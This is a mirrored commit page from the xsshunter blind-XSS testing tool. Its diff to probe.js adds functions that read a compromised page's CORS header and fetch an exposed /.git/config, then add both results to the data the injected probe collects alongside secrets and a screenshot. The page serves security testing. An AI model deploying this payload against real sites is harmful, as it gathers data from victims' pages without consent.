Mirrors/xsshunter
2
0
Fork 0
mirror of https://github.com/trufflesecurity/xsshunter synced 2024-11-10 06:44:13 +00:00
Code Issues Projects Releases Packages Wiki Activity

adding checks for CORS and git

Browse source
This commit is contained in:
counter 2023-01-26 09:53:54 -08:00
parent 72f84a2633
commit 71bdb9bf33
1 changed files with 30 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

30
probe.js
View file

@ -79,6 +79,26 @@ function base64_to_blob(base64Data, contentType) {
return new Blob(byteArrays, { type: contentType });
}
let check_cors = async function(){
let res = await fetch("", {method: 'HEAD'})
for (const header of res.headers){
if (header[0].toLowerCase() == "access-control-allow-origin"){
return header[1];
}
}
return false
}
let check_git = async function(){
let res = await fetch("/.git/config");
let text = await res.text();
if (text.startsWith("[core]")){
return text
}
return false
}
function get_guid() {
var S4 = function() {
return (((1+Math.random())*0x10000)|0).toString(16).substring(1);
@ -298,6 +318,16 @@ function hook_load_if_not_ready() {
} catch ( e ) {
probe_return_data['secrets'] = [];
}
try{
probe_return_data['CORS'] = check_cors();
} catch (e) {
probe_return_data['CORS'] = false;
}
try{
probe_return_data['gitExposed'] = check_git();
} catch (e) {
probe_return_data['gitExposed'] = false;
}
probe_return_data['secrets'] = JSON.stringify(probe_return_data['secrets']);
html2canvas(document.body).then(function(canvas) {
StackBlur.canvasRGB(